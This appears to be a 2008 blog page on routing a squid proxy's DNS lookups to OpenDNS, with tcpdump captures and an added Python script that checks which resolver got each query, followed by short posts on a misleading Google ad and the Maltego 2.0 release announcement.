#               in /etc/sysconfig/network/dhcp, or
#               set MODIFY_RESOLV_CONF_DYNAMICALLY=no in
#               /etc/sysconfig/network/config or (manually) use dhcpcd
#               with -R. If you only want to keep your searchlist, set
#               DHCLIENT_KEEP_SEARCHLIST=yes in /etc/sysconfig/network/dhcp or
#               (manually) use the -K option.
### END INFO
nameserver 208.67.222.222
nameserver 208.67.220.220

And yes, I have set both options to 'no'

To clear the dns 'cache' I used:
/etc/init.d/nscd restart

What puzzled me is the following output when I use my local browser [which tunnels its requests to the remote host]and monitor the DNS queries on the remote host's interface [the remote host being my-host.xxx, my provider's DNS server being lookup2.colo.xxx]:

tcpdump -p -i eth0 port 53

15:52:19.525862 IP my-host.xxx.33278 > lookup2.colo.xxx.domain: 28225+ A? mokumvonamsterdam.blogspot.com. (48)
15:52:19.526356 IP my-host.xxx.39176 > resolver1.opendns.com.domain: 28417+ PTR? 188.250.202.213.in-addr.arpa. (46)
15:52:19.542138 IP lookup2.colo.xxx.domain > my-host.xxx.33278: 28225 2/7/7[|domain]
15:52:19.739094 IP resolver1.opendns.com.domain > my-host.xxx.39176: 28417 1/0/0 (75)
15:52:19.739459 IP my-host.xxx.39176 > resolver1.opendns.com.domain: 17259+ PTR? 81.240.202.213.in-addr.arpa. (45)
15:52:19.949697 IP resolver1.opendns.com.domain > my-host.xxx.39176: 17259 1/0/0 (67)
15:52:19.950334 IP my-host.xxx.39176 > resolver1.opendns.com.domain: 48705+ PTR? 222.222.67.208.in-addr.arpa. (45)
15:52:19.973525 IP resolver1.opendns.com.domain > my-host.xxx.39176: 48705 1/0/0 (80)
15:52:20.698247 IP my-host.xxx.33278 > lookup2.colo.xxx.domain: 63234+ A? www.blogger.com. (33)
15:52:21.028751 IP lookup2.colo.xxx.domain > my-host.xxx.33278: 63234 2/7/7[|domain]
15:52:23.133656 IP my-host.xxx.33278 > lookup2.colo.xxx.domain: 57393+ A? www.youtube.com. (33)
15:52:23.134089 IP lookup2.colo.xxx.domain > my-host.xxx.33278: 57393 3/3/3 A youtube.com,[|domain]
15:52:23.134563 IP my-host.xxx.39176 > resolver1.opendns.com.domain: 51875+ PTR? 253.153.65.208.in-addr.arpa. (45)
15:52:23.157911 IP resolver1.opendns.com.domain > my-host.xxx.39176: 51875 1/0/0 (70)
15:52:24.315674 IP my-host.xxx.33278 > lookup2.colo.xxx.domain: 48709+ A? twitter.com. (29)
15:52:24.502987 IP lookup2.colo.xxx.domain > my-host.xxx.33278: 48709 1/5/5 A[|domain]
15:52:25.981131 IP my-host.xxx.33278 > lookup2.colo.xxx.domain: 25981+ A? www.google.com. (32)
15:52:25.981560 IP lookup2.colo.xxx.domain > my-host.xxx.33278: 25981 5/7/7 CNAME www.l.google.com.,[|domain]
15:52:28.057148 IP my-host.xxx.33278 > lookup2.colo.xxx.domain: 20445+ A? www.google-analytics.com. (42)
15:52:28.057758 IP lookup2.colo.xxx.domain > my-host.xxx.33278: 20445 5/7/7 CNAME[|domain]
15:52:29.280144 IP my-host.xxx.33278 > lookup2.colo.xxx.domain: 59181+ A? toolbarqueries.google.com. (43)
15:52:29.408904 IP lookup2.colo.xxx.domain > my-host.xxx.33278: 59181 5/7/7[|domain]

Turned out that I had to restart squid [/etc/init.d/squid restart] to make the resolving act nicely and forward _all_ lookups to opendns.com. Squid's internal resolver reads /etc/resolv.conf once, at startup [or on squid -k reconfigure], so restarting nscd did nothing for it; the dns_nameservers directive in squid.conf pins the resolvers explicitly if you would rather not depend on that file. Also telling: the PTR queries that did reach OpenDNS in the first capture were tcpdump's own reverse lookups [no -n], done through libc, which had picked up the new file just fine.

16:12:04.543848 IP my-host.xxx.39176 > resolver1.opendns.com.domain: 8407+ A? mokumvonamsterdam.blogspot.com. (48)
16:12:04.567414 IP resolver1.opendns.com.domain > my-host.xxx.39176: 8407 2/0/0[|domain]
16:12:05.282740 IP my-host.xxx.39176 > resolver1.opendns.com.domain: 58294+ A? www.blogger.com. (33)
16:12:05.306651 IP resolver1.opendns.com.domain > my-host.xxx.39176: 58294 2/0/0 CNAME[|domain]
16:12:08.624282 IP my-host.xxx.39176 > resolver1.opendns.com.domain: 59333+ A? central.ujcfedweb.org. (39)
16:12:08.843032 IP resolver1.opendns.com.domain > my-host.xxx.39176: 59333 2/0/0 CNAME[|domain]
16:12:10.189203 IP my-host.xxx.39176 > resolver1.opendns.com.domain: 58807+ A? twitter.com. (29)
16:12:10.212537 IP resolver1.opendns.com.domain > my-host.xxx.39176: 58807 1/0/0 A 128.121.146.100 (45)
16:12:10.213033 IP my-host.xxx.39177 > resolver1.opendns.com.domain: 18146+ PTR? 100.146.121.128.in-addr.arpa. (46)
16:12:10.236480 IP resolver1.opendns.com.domain > my-host.xxx.39177: 18146 NXDomain 0/0/0 (46)
16:12:12.703541 IP my-host.xxx.39176 > resolver1.opendns.com.domain: 11197+ A? www.google.com. (32)
16:12:12.727000 IP resolver1.opendns.com.domain > my-host.xxx.39176: 11197 3/0/0 CNAME[|domain]
16:12:13.629888 IP my-host.xxx.39176 > resolver1.opendns.com.domain: 24465+ A? www.justsayhi.com. (35)
16:12:13.738147 IP resolver1.opendns.com.domain > my-host.xxx.39176: 24465 1/0/0 A 4.78.241.72 (51)
16:12:13.738702 IP my-host.xxx.39177 > resolver1.opendns.com.domain: 42572+ PTR? 72.241.78.4.in-addr.arpa. (42)
16:12:14.273047 IP resolver1.opendns.com.domain > my-host.xxx.39177: 42572 NXDomain 1/0/0 CNAME[|domain]
16:12:15.706642 IP my-host.xxx.39176 > resolver1.opendns.com.domain: 54172+ A? www.google-analytics.com. (42)
16:12:15.730274 IP resolver1.opendns.com.domain > my-host.xxx.39176: 54172 5/0/0 CNAME[|domain]
16:12:18.673145 IP my-host.xxx.39176 > resolver1.opendns.com.domain: 40629+ A? toolbarqueries.google.com. (43)
16:12:18.696662 IP resolver1.opendns.com.domain > my-host.xxx.39176: 40629 5/0/0[|domain]
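Added example, not part of the post: a Python checker that reads tcpdump's summary lines [the two captures above are embedded as its sample input] and reports, per resolver, the query types and the local source ports, flagging anything that went to a resolver outside an allowed set. The source port is the tell: the A lookups triggered by browsing through squid all came from port 33278 and went to the old resolver, while port 39176 carried the PTR lookups tcpdump itself made for the names on screen [no -n], through libc, which had already picked up the new resolv.conf. The allowed resolver names are an assumption (tcpdump printed names, not addresses).

```python
import re
from collections import Counter, defaultdict

# Added example (not from the post): parse tcpdump's DNS summary lines like the
# captures above and report what each resolver was asked and from which local
# port, so a split like the one seen (A lookups to the colo resolver on one
# socket, PTR lookups to OpenDNS on another) is caught mechanically.

QUERY_RE = re.compile(
    r"^\S+ IP (?P<src>\S+)\.(?P<sport>\d+) > (?P<dst>\S+)\.domain: "
    r"\d+\+ (?P<qtype>[A-Z]+)\? (?P<qname>\S+) \(\d+\)$"
)


def resolver_report(lines, allowed):
    """Return ({resolver: Counter(qtype)}, {resolver: set(source ports)},
    [(resolver, qtype, qname) for every query sent outside `allowed`])."""
    by_resolver, ports, offenders = defaultdict(Counter), defaultdict(set), []
    for line in lines:
        m = QUERY_RE.match(line)
        if not m:
            continue  # responses and anything that is not a query summary
        by_resolver[m["dst"]][m["qtype"]] += 1
        ports[m["dst"]].add(m["sport"])
        if m["dst"] not in allowed:
            offenders.append((m["dst"], m["qtype"], m["qname"]))
    return dict(by_resolver), dict(ports), offenders


# Assumed: the reverse names tcpdump shows for the two OpenDNS addresses.
ALLOWED = {"resolver1.opendns.com", "resolver2.opendns.com"}

# The two captures quoted in the post, before and after the squid restart.
BEFORE = """\
15:52:19.525862 IP my-host.xxx.33278 > lookup2.colo.xxx.domain: 28225+ A? mokumvonamsterdam.blogspot.com. (48)
15:52:19.526356 IP my-host.xxx.39176 > resolver1.opendns.com.domain: 28417+ PTR? 188.250.202.213.in-addr.arpa. (46)
15:52:19.542138 IP lookup2.colo.xxx.domain > my-host.xxx.33278: 28225 2/7/7[|domain]
15:52:19.739094 IP resolver1.opendns.com.domain > my-host.xxx.39176: 28417 1/0/0 (75)
15:52:19.739459 IP my-host.xxx.39176 > resolver1.opendns.com.domain: 17259+ PTR? 81.240.202.213.in-addr.arpa. (45)
15:52:19.949697 IP resolver1.opendns.com.domain > my-host.xxx.39176: 17259 1/0/0 (67)
15:52:19.950334 IP my-host.xxx.39176 > resolver1.opendns.com.domain: 48705+ PTR? 222.222.67.208.in-addr.arpa. (45)
15:52:19.973525 IP resolver1.opendns.com.domain > my-host.xxx.39176: 48705 1/0/0 (80)
15:52:20.698247 IP my-host.xxx.33278 > lookup2.colo.xxx.domain: 63234+ A? www.blogger.com. (33)
15:52:21.028751 IP lookup2.colo.xxx.domain > my-host.xxx.33278: 63234 2/7/7[|domain]
15:52:23.133656 IP my-host.xxx.33278 > lookup2.colo.xxx.domain: 57393+ A? www.youtube.com. (33)
15:52:23.134089 IP lookup2.colo.xxx.domain > my-host.xxx.33278: 57393 3/3/3 A youtube.com,[|domain]
15:52:23.134563 IP my-host.xxx.39176 > resolver1.opendns.com.domain: 51875+ PTR? 253.153.65.208.in-addr.arpa. (45)
15:52:23.157911 IP resolver1.opendns.com.domain > my-host.xxx.39176: 51875 1/0/0 (70)
15:52:24.315674 IP my-host.xxx.33278 > lookup2.colo.xxx.domain: 48709+ A? twitter.com. (29)
15:52:24.502987 IP lookup2.colo.xxx.domain > my-host.xxx.33278: 48709 1/5/5 A[|domain]
15:52:25.981131 IP my-host.xxx.33278 > lookup2.colo.xxx.domain: 25981+ A? www.google.com. (32)
15:52:25.981560 IP lookup2.colo.xxx.domain > my-host.xxx.33278: 25981 5/7/7 CNAME www.l.google.com.,[|domain]
15:52:28.057148 IP my-host.xxx.33278 > lookup2.colo.xxx.domain: 20445+ A? www.google-analytics.com. (42)
15:52:28.057758 IP lookup2.colo.xxx.domain > my-host.xxx.33278: 20445 5/7/7 CNAME[|domain]
15:52:29.280144 IP my-host.xxx.33278 > lookup2.colo.xxx.domain: 59181+ A? toolbarqueries.google.com. (43)
15:52:29.408904 IP lookup2.colo.xxx.domain > my-host.xxx.33278: 59181 5/7/7[|domain]
"""

AFTER = """\
16:12:04.543848 IP my-host.xxx.39176 > resolver1.opendns.com.domain: 8407+ A? mokumvonamsterdam.blogspot.com. (48)
16:12:04.567414 IP resolver1.opendns.com.domain > my-host.xxx.39176: 8407 2/0/0[|domain]
16:12:05.282740 IP my-host.xxx.39176 > resolver1.opendns.com.domain: 58294+ A? www.blogger.com. (33)
16:12:05.306651 IP resolver1.opendns.com.domain > my-host.xxx.39176: 58294 2/0/0 CNAME[|domain]
16:12:08.624282 IP my-host.xxx.39176 > resolver1.opendns.com.domain: 59333+ A? central.ujcfedweb.org. (39)
16:12:08.843032 IP resolver1.opendns.com.domain > my-host.xxx.39176: 59333 2/0/0 CNAME[|domain]
16:12:10.189203 IP my-host.xxx.39176 > resolver1.opendns.com.domain: 58807+ A? twitter.com. (29)
16:12:10.212537 IP resolver1.opendns.com.domain > my-host.xxx.39176: 58807 1/0/0 A 128.121.146.100 (45)
16:12:10.213033 IP my-host.xxx.39177 > resolver1.opendns.com.domain: 18146+ PTR? 100.146.121.128.in-addr.arpa. (46)
16:12:10.236480 IP resolver1.opendns.com.domain > my-host.xxx.39177: 18146 NXDomain 0/0/0 (46)
16:12:12.703541 IP my-host.xxx.39176 > resolver1.opendns.com.domain: 11197+ A? www.google.com. (32)
16:12:12.727000 IP resolver1.opendns.com.domain > my-host.xxx.39176: 11197 3/0/0 CNAME[|domain]
16:12:13.629888 IP my-host.xxx.39176 > resolver1.opendns.com.domain: 24465+ A? www.justsayhi.com. (35)
16:12:13.738147 IP resolver1.opendns.com.domain > my-host.xxx.39176: 24465 1/0/0 A 4.78.241.72 (51)
16:12:13.738702 IP my-host.xxx.39177 > resolver1.opendns.com.domain: 42572+ PTR? 72.241.78.4.in-addr.arpa. (42)
16:12:14.273047 IP resolver1.opendns.com.domain > my-host.xxx.39177: 42572 NXDomain 1/0/0 CNAME[|domain]
16:12:15.706642 IP my-host.xxx.39176 > resolver1.opendns.com.domain: 54172+ A? www.google-analytics.com. (42)
16:12:15.730274 IP resolver1.opendns.com.domain > my-host.xxx.39176: 54172 5/0/0 CNAME[|domain]
16:12:18.673145 IP my-host.xxx.39176 > resolver1.opendns.com.domain: 40629+ A? toolbarqueries.google.com. (43)
16:12:18.696662 IP resolver1.opendns.com.domain > my-host.xxx.39176: 40629 5/0/0[|domain]
"""

if __name__ == "__main__":
    for label, capture in (("before squid restart", BEFORE), ("after squid restart", AFTER)):
        counts, ports, bad = resolver_report(capture.splitlines(), ALLOWED)
        print(label, dict(counts), ports, f"{len(bad)} off-policy queries")
```

Run against the first capture it reports seven A queries to lookup2.colo.xxx, all from one socket, and none after the restart; run it with -n on the capture side and the PTR noise disappears as well.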


Hope this helps someone trying to use opendns.com too.

Friday 2 May 2008

Google ads my Inbox(1) !!!


Here is a nice variation on misleading Google ads: claiming your Inbox has (1) unread email, smart move [thanks to Twitter, Twinkle & Jeroen Mirck for making this possible :P].


I liked the people who used the ASCII ads last year; I really am in the market for funny ads that make me wonder, think or just laugh.
Unfortunately, ASCII art ads are over since Google altered the 'punctuation' rule.

Thursday 1 May 2008

Maltego v2 - is ready!


Oh boy, I am so excited!

Get it at: http://www.paterva.com/maltego/

All,

After 15 months of work Maltego version 2.0 is ready. It's been a long and interesting road. Many of you have seen the product grow from beta 1 to beta 2, then KZ3 and JS1. I've shared with you the challenges, the ups and downs. Finally, today, I am happy to release version 2.0.
Version 2.0 is commercial and I feel it's got the right to be commercial because it's by far the coolest and most useful application I've ever used (OK, so perhaps I am just slightly biased). As I've mentioned before - it goes live to this list first. Everything is set up, but not linked to the main site. I will link it on Monday.

Also - as promised - a list of new features/improvements:

* Load/Save of entire graphs means you can always go back to your investigation.
* Printing of graphs (over multiple pages)
* Export of entities (CSV format) makes it easy to import Maltego data into other databases.
* Commercial grade layout library:
o The layout and navigation have been optimized for speed and usability.
o Four layout types to rearrange data the way YOU want it.
o Two view types for finding relevant info on large graphs.
* More entities and 20 brand new transforms for even deeper searches and more information.
* Search/Find (on entity value, detailed info and additional fields) helps you to get to key nodes quicker.
* Multiple open graphs on different tabs for easy switching between graphs.
* Dedicated clear-all, zoom buttons for notebook users.
* Hollywood quality look & feel will impress your friends and your boss.
* Integrated help on transforms and entities to increase your learning curve.
* Complete user guide ensures you are never lost.
* Prepopulated and preconfigured transforms and transform sets save you time.
* Population of API key integrated with license key so it’s never lost.
* Platform independent installer means you can install it anywhere.

If you want to see what it looks like before making a commitment you should look at the user guide and the screen shots. You should also read the system requirements.

The documentation can be found at http://ctas.paterva.com/wiki

Enjoy responsibly,
Roelof.